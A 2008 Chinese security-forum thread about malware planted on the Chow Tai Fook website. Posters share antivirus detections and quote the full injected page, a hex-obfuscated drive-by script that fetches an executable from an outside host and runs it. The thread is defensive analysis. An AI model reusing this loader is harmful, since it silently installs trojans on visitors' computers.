周大福網站被掛

显示全部楼层 · 发表于 2008-4-11 18:10:47

├─D
│  └─WINDOWS
│       ~tmp2562.exe
│
└─I
└─Temp
         ~DFC874.tmp

显示全部楼层 · 发表于 2008-4-11 18:24:21

当看到这地址后就没兴趣了

显示全部楼层 · 发表于 2008-4-11 18:47:46

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\xx.zip'
C:\Documents and Settings\Administrator\桌面\xx.zip
  [0] Archive type: ZIP
  --> xx.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [INFO]    A backup was created as '482d423e.qua'  ( QUARANTINE )
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2008-4-11 20:03:27

6/0

rising20.39.42未杀！

显示全部楼层 · 发表于 2008-4-11 20:11:47

http://www.52m6.com/mm/0.htm已挂。

显示全部楼层 · 发表于 2008-4-11 20:15:43

原帖由 秋叶濛濛 于 2008-4-11 14:46 发表
Log is generated by FreShow.
[wide]http://www.ctf2.com/
[frame]http://www.ctf2.com/home.htm
[frame]http://www.ctf2.com/bottomM.asp
[frame]http://www.52m6.com/mm/tk01.htm
...

<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
s="js"
flag_type=s
S="66756e6374696F6E20676E286E29200d0a7b200D0A766172206e756"
S=S+"D626572203D204D6174682E72616e646f6D28292a6e3B2072657475"
S=S+"726E20277E746D70272b4d6174682e726F756E64286E756D6265722"
S=S+"92b272e657865273b200D0a7D200D0A6C6A3d22687474703A2F2f63"
S=S+"63632E3532676f6c2e636F6D2f78782e657865223B0D0A747279200"
S=S+"d0a7b206161613D226f223B0d0A6262623d22626a65223B0D0A7979"
S=S+"793D226374223b0D0a6363633d2241646f64223b0D0a6464643d226"
S=S+"22E53747265616D223B0D0a6565653d224D6963726f736F66742E58"
S=S+"4d4C485454222b2250223b0d0a6767673D226f223B0d0a6B6B6B3d2"
S=S+"270223b0D0A6D6D6d3d2265223B0d0a7373733D226e223b0D0a7661"
S=S+"722064663D646F63756D656E742e637265617465456C656D656e742"
S=S+"86161612B6262622B797979293b200D0A64662e7365744174747269"
S=S+"627574652822636c6173736964222c22636C7369643a42443936433"
S=S+"535362d363541332D313144302d393833412D303043303446433239"
S=S+"45333622293b200d0A76617220783d64662e4372656174654F626a6"
S=S+"56374286565652c2222293B200d0a76617220533d64662E43726561"
S=S+"74654F626a656374286363632B6464642c2222293B200D0a532E747"
S=S+"970653d313b200d0A782E6f70656E2822474554222c206c6A2C3029"
S=S+"3b0d0A782e73656E6428293b200d0a6D7A313D676e2831303030302"
S=S+"93B200D0A76617220463d64662E4372656174654F626a6563742822"
S=S+"536372697074696e672e46696c6553797374656D4F626a656374222"
S=S+"c2222293b200d0a76617220746D703d462e4765745370656369616c"
S=S+"466f6c6465722830293B206D7A313d20462e4275696C64506174682"
S=S+"8746d702c6d7A31293b200D0A532E4f70656E28293b0D0A7474743d"
S=S+"782e726573706F6e7365426F64793B0d0a532E57726974652874747"
S=S+"4293B200d0A693d323b0D0a532E53617665546f46696c65286D7a31"
S=S+"2c69293B20532e436c6F736528293B200D0A76617220513D64662E4"
S=S+"372656174654F626A65637428225368656c6c2E4170706c69636174"
S=S+"696F6E222C2222293B200D0A657870313D462e4275696c645061746"
S=S+"828746d702B275C5C737973272b2774656D3332272c27636d642e65"
S=S+"786527293B200d0A515b225368656c6c45222B22786563757465225"
S=S+"d28657870312C27202F6320272B6d7A312c22222c6767672B6B6b6b"
S=S+"2b6d6d6D2b7373732c30293B200d0A7D206361746368286929207B2"
S=S+"0693d313b207D200d0A"
D=""
DO WHILE LEN(S)>1
k="&H"
k=k+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="html" then
document.write(D)
end if
if flag_type="vbs" then
EXECUTE D
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
var e;
try
{
eval(D);
}
catch(e){}
}
</script>
</body>
</html>

显示全部楼层 · 发表于 2008-4-11 20:17:51

特别粘贴到c32asm

显示全部楼层 · 发表于 2008-4-11 20:24:25

D:\download\xx.zip>>xx.exe TrojanDownloader.Nurech.bd.bmqk 木马还未处理

显示全部楼层 · 发表于 2008-4-11 20:27:07

原帖由 秋叶濛濛 于 2008-4-11 20:17 发表
特别粘贴到c32asm

不懂你意思！？

显示全部楼层 · 发表于 2008-4-11 20:31:01

McAfee MISS

[已鉴定] 周大福網站被掛

回复 4楼 EQ2 的帖子

http://www.52m6.com/14.htm怎么解出来的？